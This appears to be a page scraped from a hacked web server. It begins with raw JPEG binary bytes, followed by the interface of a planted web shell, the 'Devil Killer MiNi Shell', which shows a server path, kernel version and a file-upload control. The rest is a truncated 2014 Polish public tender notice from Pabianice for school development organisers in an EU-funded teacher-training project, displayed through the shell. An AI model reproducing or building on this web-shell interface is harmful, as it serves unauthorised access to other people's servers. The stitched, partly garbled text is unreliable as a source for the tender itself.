JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140710/149581-N-2014.html

<p class="kh_header"><b>Pabianice: PEŁNIENIE FUNKCJI SZKOLNEGO ORGANIZATORA ROZWOJU EDUKACJI W RAMACH REALIZACJI PROJEKTU PN. NOWY SYSTEM DOSKONALENIA NAUCZYCIELI POWIATU PABIANICKIEGO</b><br>
<b>Numer ogłoszenia: 149581 - 2014; data zamieszczenia: 10.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Ośrodek Doskonalenia Nauczycieli i Doradztwa Metodycznego , ul. Kazimierza 8, 95-200 Pabianice, woj. łódzkie, tel. 42 215 42 42, faks 42 215 04 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://wwww.podn-pabianice.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI SZKOLNEGO ORGANIZATORA ROZWOJU EDUKACJI W RAMACH REALIZACJI PROJEKTU PN. NOWY SYSTEM DOSKONALENIA NAUCZYCIELI POWIATU PABIANICKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający w imieniu Starostwa Powiatowego w Pabianicach jest realizatorem projektu pn. Nowy system doskonalenia nauczycieli powiatu pabianickiego - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Priorytetu III Wysoka jakość systemu oświaty Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki. Głównym celem projektu jest poprawa spójności i efektywności organizacji działań ukierunkowanych na doskonalenie nauczycieli powiatu pabianickiego poprzez opracowanie i wdrożenie Powiatowego  Programu Wspomagania w latach 2014 - 2015.
2. Do projektu zostało zakwalifikowanych 28 placówek oświatowych: 4 przedszkola, 12 szkół podstawowych, 6 gimnazjów oraz 6 zespołów szkół ponadgimnazjalnych. Zamawiający przewiduje podział placówek biorących udział w projekcie na 7 grup - do każdej zostaną zakwalifikowane po cztery jednostki. Szczegółowy przydział jednostek zostanie określony w późniejszym czasie. 
3. Przedmiotem zamówienia objętego niniejszym postępowaniem jest kompleksowe wspomaganie w/w placówek oświatowych biorących udział w projekcie poprzez wybór 7 Szkolnych Organizatorów Rozwoju Edukacji (SORE). W ramach każdej z 28 placówek przewidziana jest realizacja usługi w wymiarze 93 godzin.
Zamawiający dopuszcza możliwość składania ofert częściowych według poniższego podziału. 
4. Podział na części:
4.1. Część I: Pełnienie funkcji SORE dla 4 szkół/przedszkoli.
4.2. Część II: Pełnienie funkcji SORE dla 4 szkół/przedszkoli.
4.3. Część III: Pełnienie funkcji SORE dla 4 szkół/przedszkoli.
4.4. Część IV: Pełnienie funkcji SORE dla 4 szkół/przedszkoli.
4.5. Część V:  Pełnienie funkcji SORE dla 4 szkół/przedszkoli.
4.6. Część VI: Pełnienie funkcji SORE dla 4 szkół/przedszkoli.
4.7. Część VII: Pełnienie funkcji SORE dla 4 szkół/przedszkoli.
5. Do zadań każdego z SORE będzie należało:
5.1. Koordynacja procesów rozwojowych podopiecznych szkół/przedszkoli poprzez:
a) pomoc w przeprowadzeniu diagnozy potrzeb rozwojowych,
b) opracowanie rocznych planów wsparcia każdej szkoły/przedszkola (jednego na rok szkolny),
c) wybór i dostosowanie oferty doskonalenia do potrzeb każdej szkoły/przedszkola,
d) pomoc w opracowaniu szczegółowego zakresu zadań i wymagań ekspertów do prowadzenia spotkań edukacyjnych uwzględnionych w planie wsparcia i ofercie doskonalenia,
e) monitorowanie procesu doskonalenia, w tym: prowadzenie spotkań, konsultacji zbiorowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
f) utrzymywanie stałego kontaktu z dyrektorami i nauczycielami,
g) udział w konsultacjach indywidualnych dla nauczycieli,
h) przygotowanie sprawozdania z rocznego planu wsparcia,
i) ewaluację procesu wsparcia, według wskazań Zamawiającego.
5.2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
5.3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego.
6. W ramach realizacji projektu przewidywana jest następująca tematyka zagadnień:
a) Jak pomóc uczniowi osiągnąć sukces edukacyjny? 
b) Ocenianie kształtujące 
c) Techniki uczenia się i metody motywujące do nauki 
d) Uczeń - aktywny uczestnik procesu uczenia się 
e) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
f) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej 
g) Wspieranie pracy wychowawców klas - bezpieczna szkoła 
h) Postawy uczniowskie. Jak je kształtować? 
i) Budowa koncepcji pracy szkoły 
j) Praca z uczniem młodszym 
k) Praca z uczniem zdolnym 
l) Praca z uczniem o specjalnych potrzebach edukacyjnych 
m) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
n) Projekt edukacyjny w szkole 
o) Współpraca szkoły ze środowiskiem lokalnym 
p) Rodzice są partnerami szkoły 
q) Nauczyciel 45+ 
r) Szkoła promuje wartość edukacji 
s) Doradztwo edukacyjno-zawodowe w szkole 
t) Efektywna organizacja pracy zespołów nauczycielskich
u) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych 
v) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły? 
w) Jak i po co prowadzić ewaluacje wewnętrzną? 
x) Pierwszy/drugi rok pracy dyrektora szkoły
7. Wymagane jest, aby SORE posiadał m.in.:
- podstawową znajomość lokalnego środowiska oświatowego,
- umiejętności z zakresu moderowania grupy,
- umiejętność komunikacji interpersonalnej,
- umiejętność obsługi komputera i umiejętność pracy na platformie cyfrowej.
8. Kody CPV: 80.00.00.00-4 usługi edukacyjne.
9. Termin realizacji zamówienia (dla wszystkich części przedmiotu zamówienia): od  01.08.2014 roku do 30.06.2015 roku. 
10. W ramach realizacji usługi, Wykonawca winien spotkać się co najmniej raz w tygodniu z koordynatorem projektu w siedzibie Zamawiającego.
11. Warunki finansowe rozliczeń:
a. Rozliczenia wieloetapowe, będą następowały w systemie miesięcznym - miesięczne wynagrodzenie ryczałtowe - płatne z dołu.
b. Wartość miesięcznego wynagrodzenia będzie ustalana na podstawie ilości wypracowanych w danym miesiącu godzin.
c. Podstawą wystawienia faktury (rachunku) będzie podpisany protokół, potwierdzający realizację przedmiotu zamówienia za dany miesiąc.
d. Każdorazowo faktura (rachunek) będzie przekazywany Zamawiającemu do 7 dnia kolejnego miesiąca za miesiąc poprzedni, z zastrzeżeniem iż za miesiąc grudzień 2014 roku, faktura (rachunek) zostanie wyjątkowo przekazany do 24 grudnia 2014 roku.
e. Każdorazowo wynagrodzenie będzie płatne przelewem w terminie do 14 dni od daty otrzymania oryginału prawidłowo wystawionej faktury (rachunku).
f. Podane w ofercie wynagrodzenie jest stałe i nie podlega waloryzacji w trakcie obowiązywania umowy.
g. Wynagrodzenie zawiera również wszelkie koszty, jakie Wykonawca będzie zobowiązany ponieść z tytułu realizacji przedmiotu zamówienia, w szczególności kosztów dojazdu, zakwaterowania, rozmów telefonicznych komórkowych, itd. Ponadto podane przez Wykonawcę wynagrodzenie zawiera również inne koszty wynikające z realizacji zadania, bez których wykonanie zadania byłoby niemożliwe - podatek VAT, podatek dochodowy, opłaty na rzecz organów ZUS, Urzędu Skarbowego. W przypadku złożenia oferty przez Wykonawcę, który nie prowadzi działalności gospodarczej, wszelkie zobowiązania, takie jak podatek dochodowy, opłaty na rzecz organów ZUS, Urzędu Skarbowego, będą potrącane przez Zamawiającego i wnoszone w imieniu Wykonawcy na rzecz odpowiednich instytucji..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których jest mowa w art. 67 ust. 1 pkt. 6 ustawy PZP do wysokości 20% wartości zamówienia podstawowego i polegających na powtórzeniu zamówień o tym samym charakterze</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia. Ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia oraz przedłożenie wykazu
zrealizowanych zamówień potwierdzających dysponowanie doświadczeniem zawodowym polegającym na zrealizowaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
- co najmniej 80 godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi (doświadczenie w pracy w systemie doskonalenia nauczycieli), - co najmniej 50 godzin doświadczenia w koordynacji pracami zespołów (zespołu szkolnego, zespołu przedmiotowego/zadaniowego, zespołu międzyszkolnego), 
ocena spełniania warunku nastąpi w oparciu o sprawdzenie oświadczenia, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia. Ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia oraz przedstawienie dokumentów potwierdzających dysponowanie min. jedną osobą posiadającą łącznie następujące kwalifikacje zawodowe (wymóg dla każdej z części jednakowy): 
- ukończone co najmniej studia wyższe II stopnia z przygotowaniem pedagogicznym, 
- uzyskany stopień awansu zawodowego minimum nauczyciel mianowany, 
- ukończone szkolenie dla SORE potwierdzone certyfikatem, 
- ukończony kurs doskonalenia zawodowego w jednym z następujących obszarów: zmiany w edukacji, umiejętności społeczne, stosowanie w pracy technologii
informacyjno - komunikacyjnych). 
ocena spełniania warunku nastąpi w oparciu o sprawdzenie oświadczenia, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia. Ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zrealizowanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
- co najmniej 80 godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi (doświadczenie w pracy w systemie doskonalenia nauczycieli), 
- co najmniej 50 godzin doświadczenia w koordynacji pracami zespołów (zespołu szkolnego, zespołu przedmiotowego/zadaniowego, zespołu międzyszkolnego);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wykaz (wzór w SIWZ) osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych
przez nie czynności - do wykazu należy dołączyć oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia; b) wykaz (wzór w SIWZ) zrealizowanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów
(poświadczeń) czy zostały zrealizowane należycie; Stosownie do dyspozycji zawartej w § 1 ust. 4 rozporządzenia przywołanego na wstępie Zamawiający wymaga uwzględnienia w wykazie co najmniej usług określonych w pkt. V.C SIWZ, załączając jednocześnie dowody potwierdzające czy zostały one wykonane lub są wykonywane należycie. 
a) Dowodami, o których mowa powyżej, z zastrzeżeniem zapisów §9 ust. 2 w/w rozporządzenia są: 
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w
postępowaniu albo ofert; 
- w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy -
jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt i) powyżej; 
b) W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy lub usługi wskazane w wykazie, o którym mowa w ust. 4 zostały wcześniej
wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w lit. a) powyżej. 
c) formularz cenowy (wzór w SIWZ). 
d) oświadczenie (wzór w SIWZ) potwierdzające: 
- podstawową znajomość lokalnego środowiska oświatowego, - umiejętności z zakresu moderowania grupy, 
- umiejętność komunikacji interpersonalnej, 
- umiejętność obsługi komputera i umiejętność pracy na platformie cyfrowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Ilość godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi - 20</li>
<li>3 - Ilość godzin doświadczenia w koordynacji pracami zespołów - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wwww.podn-pabianice.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pabianice, ul. Kazimierza 8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2014 godzina 10:00, miejsce: Pabianice, ul. Kazimierza 8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane ze środków Unii Europejskiej w ramach Europejskiego
Funduszu Społecznego w ramach Priorytetu III Wysoka jakość systemu oświaty Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji SORE dla 4 szkół/przedszkoli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań każdego z SORE będzie należało: 
1. Koordynacja procesów rozwojowych podopiecznych szkół/przedszkoli poprzez:
a) pomoc w przeprowadzeniu diagnozy potrzeb rozwojowych, 
b) opracowanie rocznych planów wsparcia każdej szkoły/przedszkola (jednego na rok szkolny), 
c) wybór i dostosowanie oferty doskonalenia do potrzeb każdej szkoły/przedszkola, d) pomoc w opracowaniu szczegółowego zakresu zadań i wymagań ekspertów do prowadzenia spotkań edukacyjnych uwzględnionych w planie wsparcia i ofercie doskonalenia, 
e) monitorowanie procesu doskonalenia, w tym: prowadzenie spotkań, konsultacji zbiorowych i indywidualnych z dyrektorami, nauczycielami, ekspertami, 
f) utrzymywanie stałego kontaktu z dyrektorami i nauczycielami, 
g) udział w konsultacjach indywidualnych dla nauczycieli, 
h) przygotowanie sprawozdania z rocznego planu wsparcia, 
i) ewaluację procesu wsparcia, według wskazań Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego. W ramach realizacji projektu przewidywana jest następująca tematyka zagadnień: 
a) Jak pomóc uczniowi osiągnąć sukces edukacyjny? 
b) Ocenianie kształtujące 
c) Techniki uczenia się i metody motywujące do nauki 
d) Uczeń - aktywny uczestnik procesu uczenia się 
e) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
f) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej 
g) Wspieranie pracy wychowawców klas - bezpieczna szkoła 
h) Postawy uczniowskie. Jak je kształtować? 
i) Budowa koncepcji pracy szkoły 
j) Praca z uczniem młodszym 
k) Praca z uczniem zdolnym 
l) Praca z uczniem o specjalnych potrzebach edukacyjnych 
m) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
